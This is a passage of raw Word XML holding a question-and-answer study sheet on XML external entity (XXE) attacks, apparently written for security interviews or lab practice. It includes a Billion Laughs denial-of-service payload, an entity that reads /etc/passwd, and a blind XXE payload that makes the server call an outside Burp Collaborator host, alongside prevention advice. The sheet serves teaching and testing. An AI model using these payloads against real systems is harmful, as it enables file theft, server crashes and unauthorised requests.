      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F998CF" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used when:</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> Normal XXE is blocked (bypass WAF/filters)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336822BA" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="57872027">
          <v:rect id="_x0000_i1203" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D091821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Q10: What is Billion Laughs Attack?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EF8CAC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20F45E6E" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>"Billion Laughs is a DoS attack using entity expansion to exhaust memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D7616D" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C166AB" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348C8052" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>&lt;!ENTITY l1 "lol"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D23873C" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>&lt;!ENTITY l2 "&amp;l1;&amp;l1;&amp;l1;&amp;l1;&amp;l1;&amp;l1;&amp;l1;&amp;l1;&amp;l1;&amp;l1;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2707BA2D" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;!-- Repeat 10x --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7E1EB8" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> Server crashes from memory exhaustion"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776D78E5" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="75E95791">
          <v:rect id="_x0000_i1204" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC3D35E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Q11: What is impact of XXE?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C907F76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6E76A230" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve">"1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read files</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> — /etc/passwd, config files, source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583900D9" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> — access internal services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE276F3" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> — crash server (Billion Laughs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FA1442" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Remote code execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> — in some cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE7E27E" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> High (CVSS 7.5-9.8)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E8F6A9" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="13D156C8">
          <v:rect id="_x0000_i1205" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="494B60AD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Q12: Where do you find XXE?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC897EC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09793917" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve">"1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XML APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8FE0AE" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File uploads</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> (SVG, XML files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAB24F6" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SOAP services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB5E295" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anywhere XML input is processed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C25993" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key line:</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> Anywhere XML is accepted → test for XXE"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F3485F" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="60FAE8EE">
          <v:rect id="_x0000_i1206" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2C5AE6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Q13: How do you test XXE?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A80319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028B8BE2" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve">"1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Find XML input</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> — API, file upload, SOAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E82209D" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Add DOCTYPE</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> — &lt;!DOCTYPE test&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212A0AC3" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Inject entity</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> — &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> SYSTEM "file:///etc/passwd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EBA3F8" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use entity</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> — &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFE45B9" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observe response</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> — if file content appears → XXE confirmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC5A1E0" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For Blind XXE:</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> Use Burp Collaborator payload"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DFD5C9" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="14C6EE18">
          <v:rect id="_x0000_i1207" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51193777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Q14: Scenario — You upload XML and see file content. What vulnerability?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F71B9F4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58F7AACB" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>"XXE (file disclosure). Server is processing external entities and returning file content."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30600FD4" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="2EA8DD52">
          <v:rect id="_x0000_i1208" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="704C08F0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Q15: Scenario — No response, but server hits your server. What vulnerability?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFFBF9F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016707EA" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>"Blind XXE (Out-of-Band). Server is processing entity but not showing output. It contacts external server (Burp Collaborator)."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30400E19" w14:textId="77777777" w:rsidR="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="1F3F5B06">
          <v:rect id="_x0000_i1209" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0462D12E" w14:textId="77777777" w:rsidR="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56"/>
    <w:p w14:paraId="74004C78" w14:textId="2469A81B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lastRenderedPageBreak/>
        <w:t>❓</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Q16: What tools do you use for XXE testing?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A82928D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0E3D07EA" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve">"1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> — intercept XML request, modify payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56654392" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Burp Collaborator</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> — detect Blind XXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DE0E49" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Manual testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> — craft custom payloads"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D6BC9E" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="5C93AC8D">
          <v:rect id="_x0000_i1210" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="730ED8C8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Q17: How to solve XXE labs?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9F5344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4A4A0CAD" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>"1. Find XML request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D532CD" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:t>Add DOCTYPE section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0A8FCE" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:t>Add entity definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433BA78E" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:t>Replace value with &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6297C4A1" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:t>Check output for file content or Collaborator interaction"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735F50B7" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="284F7FFB">
          <v:rect id="_x0000_i1211" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA882D4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Q18: How to prevent XXE?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAFCCB8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7C4D702E" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve">"1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disable external entity processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> (MOST IMPORTANT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D57D89" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use secure parsers</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> — disable DTD support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363DCF1B" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Validate input</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> — reject XML with DOCTYPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3F0C95" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prefer JSON</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> over XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D29ECD" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key line:</w:t>
      </w:r>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> Disable external entity processing in XML parsers."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4022DCE3" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:pict w14:anchorId="0CED8319">
          <v:rect id="_x0000_i1212" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1480D612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Q19: What is Blind XXE lab payload (Burp Collaborator)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA12FB4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1BAFEAF4" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D54EF5" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>&lt;!DOCTYPE test [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0042EF50" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve">&lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t xml:space="preserve"> SYSTEM "http://YOUR-ID.burpcollaborator.net"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E38F87" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F06021E" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>stockCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748BF31D" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>productId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>productId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FAA4E9" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:lastRenderedPageBreak/>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>stockCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00455B56">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25953E69" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attack Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69880BB9" w14:textId="77777777" w:rsidR="00455B56" w:rsidRPr="00455B56" w:rsidRDefault="00455B56" w:rsidP="00455B56">
      <w:r w:rsidRPr="00455B56">
        <w:t>text</w:t>
      </w:r>
    </w:p>
